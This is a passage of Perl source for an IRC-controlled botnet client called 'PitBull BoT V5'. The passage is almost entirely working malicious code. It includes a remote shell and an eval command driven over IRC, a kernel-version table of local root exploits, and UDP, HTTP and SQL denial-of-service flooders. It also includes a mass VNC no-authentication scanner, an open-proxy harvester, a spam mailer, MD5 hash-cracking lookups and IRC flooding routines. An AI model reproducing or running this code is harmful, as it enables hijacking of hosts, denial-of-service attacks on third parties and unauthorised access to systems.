(.*)<\/description>/g)
{
push(@ttt1,$1);
}
foreach $x (0..(@ttt - 1))
{
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ PacketStorm 12] ".$ttt[$x]." ".$ttt1[$x]."");
sleep 3;
$c++;
}
}
if ($funcarg =~ /^rootable/) {
my $khost = `uname -r`;
my $currentid = `whoami`;
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Rootable 12] Currently you are ".$currentid." ");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Rootable 12] The kernel of this box is ".$khost." ");
chomp($khost);
my %h;
$h{'w00t'} = {
vuln=>['2.4.18','2.4.10','2.4.21','2.4.19','2.4.17','2.4.16','2.4.20']
};
$h{'brk'} = {
vuln=>['2.4.22','2.4.21','2.4.10','2.4.20']
};
$h{'ave'} = {
vuln=>['2.4.19','2.4.20']
};
$h{'elflbl'} = {
vuln=>['2.4.29']
};
$h{'elfdump'} = {
vuln=>['2.4.27']
};
$h{'expand_stack'} = {
vuln=>['2.4.29']
};
$h{'h00lyshit'} = {
vuln=>['2.6.8','2.6.10','2.6.11','2.6.9','2.6.7','2.6.13','2.6.14','2.6.15','2.6.16','2.6.2']
};
$h{'kdump'} = {
vuln=>['2.6.13']
};
$h{'km2'} = {
vuln=>['2.4.18','2.4.22']
};
$h{'krad'} = {
vuln=>['2.6.11']
};
$h{'krad3'} = {
vuln=>['2.6.11','2.6.9']
};
$h{'local26'} = {
vuln=>['2.6.13']
};
$h{'loko'} = {
vuln=>['2.4.22','2.4.23','2.4.24']
};
$h{'mremap_pte'} = {
vuln=>['2.4.20','2.2.25','2.4.24']
};
$h{'newlocal'} = {
vuln=>['2.4.17','2.4.19','2.4.18']
};
$h{'ong_bak'} = {
vuln=>['2.4.','2.6.']
};
$h{'ptrace'} = {
vuln=>['2.2.','2.4.22']
};
$h{'ptrace_kmod'} = {
vuln=>['2.4.2']
};
$h{'ptrace24'} = {
vuln=>['2.4.9']
};
$h{'pwned'} = {
vuln=>['2.4.','2.6.']
};
$h{'py2'} = {
vuln=>['2.6.9','2.6.17','2.6.15','2.6.13']
};
$h{'raptor_prctl'} = {
vuln=>['2.6.13','2.6.17','2.6.16','2.6.13']
};
$h{'prctl3'} = {
vuln=>['2.6.13','2.6.17','2.6.9']
};
$h{'remap'} = {
vuln=>['2.4.']
};
$h{'rip'} = {
vuln=>['2.2.']
};
$h{'stackgrow2'} = {
vuln=>['2.4.29','2.6.10']
};
$h{'uselib24'} = {
vuln=>['2.4.29','2.6.10','2.4.22','2.4.25']
};
$h{'newsmp'} = {
vuln=>['2.6.']
};
$h{'smpracer'} = {
vuln=>['2.4.29']
};
$h{'loginx'} = {
vuln=>['2.4.22']
};
$h{'exp.sh'} = {
vuln=>['2.6.9','2.6.10','2.6.16','2.6.13']
};
$h{'prctl'} = {
vuln=>['2.6.']
};
$h{'kmdx'} = {
vuln=>['2.6.','2.4.']
};
$h{'raptor'} = {
vuln=>['2.6.13','2.6.14','2.6.15','2.6.16']
};
$h{'raptor2'} = {
vuln=>['2.6.13','2.6.14','2.6.15','2.6.16']
};
foreach my $key(keys %h){
foreach my $kernel ( @{ $h{$key}{'vuln'} } ){
if($khost=~/^$kernel/){
chop($kernel) if ($kernel=~/.$/);
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Rootable 12] Possible Local Root Exploits: ". $key ." ");
}
}
}
}
#Pr0xy Scan
if ($funcarg =~ /^proxy\s+(.*)/) {
my @User_Agent = &Agent();
my $str = $1;
if ($str =~ m/^(a|anon|anonymous)$/i) { $str = "anonymous";}
elsif ($str =~ m/^(transparent|tp|t)$/i) { $str = "transparent";}
elsif ($str =~ m/^(h|high|e|elite)$/i) { $str = "high anonymity";}
my @type = "$str";
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ ProxySearcher 12] Search Type: $str");
my @ttt=();
my @ttt1=();
my @ttt2=();
my @ttt3=();
my $sockt = IO::Socket::INET->new(PeerAddr=>"publicproxyservers.com",PeerPort=>"80",Proto=>"tcp") or return;
print $sockt "GET http://www.publicproxyservers.com/page1.html HTTP/1.0\r\nHost: publicproxyservers.com\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @rara = <$sockt>;
$page="@rara";
close($sockt);
while ($page =~ m//g) { push(@ttt,$1); } while ($page =~ m/ | ([A-Z].*)<\/td>/g) { push(@ttt1,$1); } while ($page =~ m/ | (.*)<\/td>/g) { push(@ttt2,$1); } while ($page =~ m/ | (anonymous|transparent|high anonymity)<\/td>/g) { push(@ttt3,$1); } foreach $proxyyy (0..(@ttt - 1)) { if ($ttt3[$proxyyy] =~ /@type/) { ( my $a, my $ipaddr ) = split( />/, $ttt[$x]); my $prox="".$ipaddr.":".$ttt2[$proxyyy].""; my $ua = LWP::UserAgent->new; $ua->timeout(10); $ua->env_proxy; $ua->agent($User_Agent[rand(scalar(@User_Agent))]); $ua->proxy('http', 'http://'.$prox); my $response = $ua->get("http://www.google.com/search?q=The_PitBull"); if ($response->is_success) { sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ ProxySearcher 12] 4 ".$ipaddr.":".$ttt2[$proxyyy]." 12- 4 $ttt1[$proxyyy] 12- 4 $ttt3[$proxyyy] 12- OK!"); } } } done; }
# A simple mailer, @sendmail if ($funcarg =~ /^sendmail\s+(.*)\s+(.*)\s+(.*)\s+(.*)/) { sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Mailer 12] Sending Mail to : 2 $3"); $subject = $1; $sender = $2; $recipient = $3; @corpo = $4; $mailtype = "content-type: text/html"; $sendmail = '/usr/sbin/sendmail'; open (SENDMAIL, "| $sendmail -t"); print SENDMAIL "$mailtype\n"; print SENDMAIL "Subject: $subject\n"; print SENDMAIL "From: $sender\n"; print SENDMAIL "To: $recipient\n\n"; print SENDMAIL "@corpo\n\n"; close (SENDMAIL); sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Mailer 12] Mail Sended To : 2 $recipient"); }
#SQL Fl00dEr if ($funcarg =~ /^sqlflood\s+(.*)\s+(\d+)/) { sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ SQL-DDOS 12] Attacking 4 ".$1." 12 on port 3306 for 4 ".$2." 12 seconds ."); my $itime = time; my ($cur_time); $cur_time = time - $itime; while ($2>$cur_time){ $cur_time = time - $itime; my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>3306); print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n"; close($socket); } sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ SQL-DDOS 12] Attacking done 4 ".$1."."); }
#r0xb0t 4.6 VNC ScaNNer by iNs if ($funcarg =~ /^vnc\s+(.*)/) { my $MAX_SOCKET_TIME = 2; my $MAX_CONNECT_TIME = 3; #&ftpcheckm($printl); my @hosts; my $MAX_PROCESSES=100; my $host=$1; #my $victim=$host; sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ VNC 12] :::: IP Range: 4 $host* "); $|=1;
foreach (0..255) { my $pre="$host.$_."; foreach (1..255) { push(@hosts,$pre.$_); } }
my @pids; my $npids=0;
for $victim (@hosts){ my $pid; $pid=fork(); if($pid>0){ $npids++; if($npids>=$MAX_PROCESSES){ for(1..($MAX_PROCESSES)){ $wait_ret=wait(); if($wait_ret>0){ $npids--; } } } next; } elsif(undef $pid) { # print "fork error\n" if ($DEBUG); exit(0); }else{ my($proto,$port); $0=""; # kill thread on timeout local $SIG{'ALRM'} = sub { exit(0); }; alarm $MAX_SOCKET_TIME; my $port=5900; print "Connecting to $victim:$port..."; #$| = 1; ($sock = IO::Socket::INET->new(PeerAddr => $victim, PeerPort => $port, Proto => 'tcp',)) ? print "\n" : die("\n");
#negotiate protocol $sock->read($protocol_version,12); print $sock $protocol_version; #print "Using protocol $protocol_version"; # get security types that we'll be ignoring $sock->read($security_types,1); $sock->read($hahaha,unpack('C',$security_types)); # choose no authentication print $sock "\x01"; # we should get "0000" back $sock->read($in,4); if(unpack('I',$in)) { die("\n") }; # client initialize print $sock "\x01"; # if the server starts sending data we are in $sock->read($in,4); (unpack('I',$in)) ? sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ VNC 12] :::: 4 ".$victim." 12is Vulnerable using protocol 4 ".$protocol_version) #print("Vulnerable!\n") : die("\n") ;
exit;
} }
for(1..$npids){ my $wt=wait(); if($wt==-1){ # print "hey $!\n" if($DEBUG); redo; } } sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ VNC 12] :::: Finished Scan for 4 $host "); }
#-#-#-#-#-#-#-#-# # IRC # #-#-#-#-#-#-#-#-# # join a other channel, @join #channel if ($funcarg =~ /^join (.*)/) { sendraw($IRC_cur_socket, "JOIN ".$1); } # part a other channel, @part #channel if ($funcarg =~ /^part (.*)/) { sendraw($IRC_cur_socket, "PART ".$1); } # quit irc, @quit if ($funcarg =~ /^quit (.*)/) { sendraw($IRC_cur_socket, "QUIT ".$1); } # voice, @voice if ($funcarg =~ /^voice (.*)/) { sendraw($IRC_cur_socket, "MODE $printl +v ".$1); } # devoice, @devoice if ($funcarg =~ /^devoice (.*)/) { sendraw($IRC_cur_socket, "MODE $printl -v ".$1); } # halfop, @halfop if ($funcarg =~ /^halfop (.*)/) { sendraw($IRC_cur_socket, "MODE $printl +h ".$1); } # dehalfop, @dehalfop if ($funcarg =~ /^dehalfop (.*)/) { sendraw($IRC_cur_socket, "MODE $printl -h ".$1); } # op, @op if ($funcarg =~ /^op (.*)/) { sendraw($IRC_cur_socket, "MODE $printl +o ".$1); } # deop, @deop if ($funcarg =~ /^deop (.*)/) { sendraw($IRC_cur_socket, "MODE $printl -o ".$1); } # +Q, @owner if ($funcarg =~ /^owner (.*)/) { sendraw($IRC_cur_socket, "MODE $printl +q ".$1); } # -Q, @deowner if ($funcarg =~ /^deowner (.*)/) { sendraw($IRC_cur_socket, "MODE $printl -q ".$1); }
#-#-#-#-#-#-#-#-# # Flooders IRC # #-#-#-#-#-#-#-#-# # msg, @msgflood if ($funcarg =~ /^msgflood (.+?) (.*)/) { for($i=0; $i<=10; $i+=1){ sendraw($IRC_cur_socket, "PRIVMSG ".$1." ".$2); } sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MSGFlood 12] 14 Excecuted on ".$1." "); }
# dccflood, @dccflood if ($funcarg =~ /^dccflood (.*)/) { for($i=0; $i<=10; $i+=1){ sendraw($IRC_cur_socket, "PRIVMSG ".$1." :\001DCC CHAT chat 1121485131 1024\001\n"); } sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ DCCFlood 12] 14 Excecuted on ".$1." "); }
# ctcpflood, @ctcpflood if ($funcarg =~ /^ctcpflood (.*)/) { for($i=0; $i<=10; $i+=1){ sendraw($IRC_cur_socket, "PRIVMSG ".$1." :\001VERSION\001\n"); sendraw($IRC_cur_socket, "PRIVMSG ".$1." :\001PING\001\n"); } sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ CTCPFlood 12] 14 Excecuted on ".$1." "); }
# noticeflood, @noticeflood if ($funcarg =~ /^noticeflood (.*)/) { for($i=0; $i<=10; $i+=1){ sendraw($IRC_cur_socket, "NOTICE ".$1." :PitBull BoT V5\n"); } sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ NoticeFlood 12] 14 Excecuted on ".$1." "); }
# Channel Flood, @channelflood if ($funcarg =~ /^channelflood/) { for($i=0; $i<=25; $i+=1){ sendraw($IRC_cur_socket, "JOIN #".(int(rand(99999))) ); } sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ ChannelFlood 12] 14 Excecuted "); }
# Maxi Flood, @maxiflood if ($funcarg =~ /^maxiflood(.*)/) { for($i=0; $i<=15; $i+=1){ sendraw($IRC_cur_socket, "NOTICE ".$1." :PitBull BoT V5 M4Xi-Fl00d\n"); sendraw($IRC_cur_socket, "PRIVMSG ".$1." :\001VERSION\001\n"); sendraw($IRC_cur_socket, "PRIVMSG ".$1." :\001PING\001\n"); sendraw($IRC_cur_socket, "PRIVMSG ".$1." :PitBull BoT V5 M4Xi-Fl00d\n"); } sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ M4Xi-Fl00d 12] 14 Excecuted on ".$1." "); }
#-#-#-#-#-#-#-#-# # DDOS # #-#-#-#-#-#-#-#-#
#HTTP Flooder if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) { sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ HTTP-DDOS 12] Attacking 4 ".$1." 12 on port 80 for 4 ".$2." 12 seconds ."); my $itime = time; my ($cur_time); $cur_time = time - $itime; while ($2>$cur_time){ $cur_time = time - $itime; my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80); print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n"; close($socket); } sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ HTTP-DDOS 12] Attacking done 4 ".$1."."); }
# UDP Flooder if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) { sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ UDP-DDOS 12] Attacking 4 ".$1." 12 with 4 ".$2." 12 Kb Packets for 4 ".$3." 12 seconds. "); my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3"); $dtime = 1 if $dtime == 0; my %bytes; $bytes{igmp} = $2 * $pacotes{igmp}; $bytes{icmp} = $2 * $pacotes{icmp}; $bytes{o} = $2 * $pacotes{o}; $bytes{udp} = $2 * $pacotes{udp}; $bytes{tcp} = $2 * $pacotes{tcp}; sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ UDP-DDOS 12] 12Results 4 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 12Kb in 4 ".$dtime." 12seconds to 4 ".$1."."); } exit; } }
sub ircase { my ($kem, $printl, $case) = @_; if ($case =~ /^join (.*)/) { j("$1"); } if ($case =~ /^part (.*)/) { p("$1"); } if ($case =~ /^rejoin\s+(.*)/) { my $chan = $1; if ($chan =~ /^(\d+) (.*)/) { for (my $ca = 1; $ca <= $1; $ca++ ) { p("$2"); j("$2"); } } else { p("$chan"); j("$chan"); } }
if ($case =~ /^op/) { op("$printl", "$kem") if $case eq "op"; my $oarg = substr($case, 3); op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); }
if ($case =~ /^deop/) { deop("$printl", "$kem") if $case eq "deop"; my $oarg = substr($case, 5); deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); }
if ($case =~ /^msg\s+(\S+) (.*)/) { msg("$1", "$2"); }
if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) { for (my $cf = 1; $cf <= $1; $cf++) { msg("$2", "$3"); } }
if ($case =~ /^ctcp\s+(\S+) (.*)/) { ctcp("$1", "$2"); }
if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) { for (my $cf = 1; $cf <= $1; $cf++) { ctcp("$2", "$3"); } }
if ($case =~ /^nick (.*)/) { nick("$1"); }
if ($case =~ /^connect\s+(\S+)\s+(\S+)/) { conectar("$2", "$1", 6667); }
if ($case =~ /^raw (.*)/) { sendraw("$1"); }
if ($case =~ /^eval (.*)/) { eval "$1"; } }
sub shell { my $printl=$_[0]; my $comando=$_[1]; if ($comando =~ /cd (.*)/) { chdir("$1") || msg("$printl", "No such file or directory"); return; }
elsif ($pid = fork) { waitpid($pid, 0); } else { if (fork) { exit;
} else { my @resp=`$comando 2>&1 3>&1`; my $c=0; foreach my $linha (@resp) { $c++; chop $linha; sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ SH3LL 12] 14 $linha"); if ($c == "$max_lines") { $c=0; sleep $sleeping; } } exit; } } }
sub Agent(){ my @ret = ( "Microsoft Internet Explorer/4.0b1 (Windows 95)", "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)", "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)", "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)", "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)", "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)", "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)", "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)", "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)", "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)", "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)", "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)", "Microsoft Pocket Internet Explorer/0.6", "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)", "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;", "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)", "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)", "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)", "Advanced Browser (http://www.avantbrowser.com)", "Avant Browser (http://www.avantbrowser.com)", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)", "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)", "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)", "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007", "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511", "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0", "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox", "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4", "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5", "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6", "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6", "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7", "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7", "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4", "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5", "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1", "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1", "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1", "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1", "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1", "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2", "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0", "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b", "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0", "Mozilla/3.0 (OS/2; U)", "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)", "Mozilla/4.61 (Macintosh; I; PPC)", "Mozilla/4.61 [en] (OS/2; U)", "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)", "Mozilla/4.8 [en] (Windows NT 5.0; U)" ); return(@ret); }
sub udpflooder { my $iaddr = inet_aton($_[0]); my $msg = 'A' x $_[1]; my $ftime = $_[2]; my $cp = 0; my (%pacotes); $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0; socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++; socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++; socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++; socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++; return(undef) if $cp == 4; my $itime = time; my ($cur_time); while ( 1 ) { for (my $port = 1; $port <= 65000; $port++) { $cur_time = time - $itime; last if $cur_time >= $ftime; send(SOCK1, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{igmp}++; send(SOCK2, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{udp}++; send(SOCK3, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{icmp}++; send(SOCK4, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{tcp}++; for (my $pc = 3; $pc <= 255;$pc++) { next if $pc == 6; $cur_time = time - $itime; last if $cur_time >= $ftime; socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next; send(SOCK5, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{o}++; } } last if $cur_time >= $ftime; } return($cur_time, %pacotes); }
sub ctcp { return unless $#_ == 1; sendraw("PRIVMSG $_[0] :\001$_[1]\001"); }
sub msg { return unless $#_ == 1; sendraw("PRIVMSG $_[0] :$_[1]"); }
sub notice { return unless $#_ == 1; sendraw("NOTICE $_[0] :$_[1]"); }
sub op { return unless $#_ == 1; sendraw("MODE $_[0] +o $_[1]"); }
sub deop { return unless $#_ == 1; sendraw("MODE $_[0] -o $_[1]"); }
sub j { &join(@_); }
sub join { return unless $#_ == 0; sendraw("JOIN $_[0]"); } sub p { part(@_); }
sub part { sendraw("PART $_[0]"); }
sub nick { return unless $#_ == 0; sendraw("NICK $_[0]"); }
sub quit { sendraw("QUIT :$_[0]"); }
sub ice(){ my $md5hash = $_[1]; chomp $md5hash; my $query = "http://ice.breaker.free.fr/md5.php?hash=".$md5hash; my $checker = query($query); if ($checker =~ m/
- (.*?)
/g) { my $cracked="$1"; sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-ice.breaker.free.fr 4@ 12 ] 4 ==> ".$cracked.""); } else { sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-ice.breaker.free.fr 4@ 12 ] 1 Has not Found."); }}
sub gdata(){ my $md5hash = $_[1]; chomp $md5hash; my $query = "http://www.gdataonline.com/qkhash.php?mode=txt&hash=".$md5hash; my $checker = query($query); if ($checker =~ m/(.*?)<\/b><\/td>/g) { my $cracked="$1"; sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-gdataonline.com 4@ 12 ] 4 ==> ".$cracked.""); } else { sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-gdataonline.com 4@ 12 ] 1 Has not Found."); }}
sub redn(){ my $md5hash = $_[1]; chomp $md5hash; my $query = "http://md5.rednoize.com/?p&s=md5&q=".$md5hash; my $checker = query($query); if ($checker =~ m/<(.*)/g) { my $cracked="$1"; sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-rednoize.com 4@ 12 ] 4 ==> ".$cracked); } else { sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-rednoize.com 4@ 12 ] 1 Has not Found."); }}
sub xpz(){ my $md5hash = $_[1]; chomp $md5hash; my $query = "http://md5.xpzone.de/?string=".$md5hash."&mode=decrypt"; my $checker = query($query); if ($checker =~ m/(.*)<\/b>/g) { my $cracked="$1"; sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-xpzone.de 4@ 12 ] 4 ==> ".$cracked); } else { sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-xpzone.de 4@ 12 ] 1 Has not Found."); }}
sub ben(){ my $md5hash = $_[1]; chomp $md5hash; my $query = "http://md5.benramsey.com/md5.php?hash=".$md5hash; my $checker = query($query); if ($checker =~ m/<\!\[CDATA\[(.+?)\]\]><\/string>/g) { my $cracked="$1"; sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-benramsey.com 4@ 12 ] 4 ==> ".$cracked); } else { sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-benramsey.com 4@ 12 ] 1 Has not Found."); }}
sub alim(){ my $md5hash = $_[1]; chomp $md5hash; my $query = "http://alimamed.pp.ru/md5/?md5e=&md5d=".$md5hash; my $checker = query($query); if ($checker =~ m/(.+?)<\/b>/g) { my $cracked="$1"; sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-alimamed.pp.ru 4@ 12 ] 4 ==> ".$cracked); } else { sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-alimamed.pp.ru 4@ 12 ] 1 Has not Found."); }}
sub cry(){ my $md5hash = $_[1]; chomp $md5hash; my $query = "http://us.md5.crysm.net/find?md5=".$md5hash; my $checker = query($query); if ($checker =~ m/(.+?)<\/li>/g) { my $cracked="$1"; sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-crysm.net 4@ 12 ] 4 ==> ".$cracked); } else { sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-crysm.net 4@ 12 ] 1 Has not Found."); }}
sub query($) { my $url=$_[0]; $url=~s/http:\/\///; my $host=$url; my $query=$url; my $page=""; $host=~s/href=\"?http:\/\///; $host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/; $query=~s/$host//; if ($query eq "") { $query="/";}; eval { my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return; print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; my @r = <$sock>; $page="@r"; close($sock); }; return $page; }
sub fix_url($) { my $str=$_[0]; if ($str =~ m/^http:\/\/(.*)/i || $str =~ m/^https:\/\/(.*)/i) { $set="".$str.""; } else { $set="http://".$str.""; } return $set; }
sub http_query($){ my ($url) = @_; my $host=$url; my $query=$url; my $page=""; $host =~ s/href=\"?http:\/\///; $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; $query =~s/$host//; if ($query eq "") {$query="/";}; eval { local $SIG{ALRM} = sub { die "1";}; alarm 10; my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return; print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; my @r = <$sock>; $page="@r"; alarm 0; close($sock); }; return $page; } } ==========================================================
|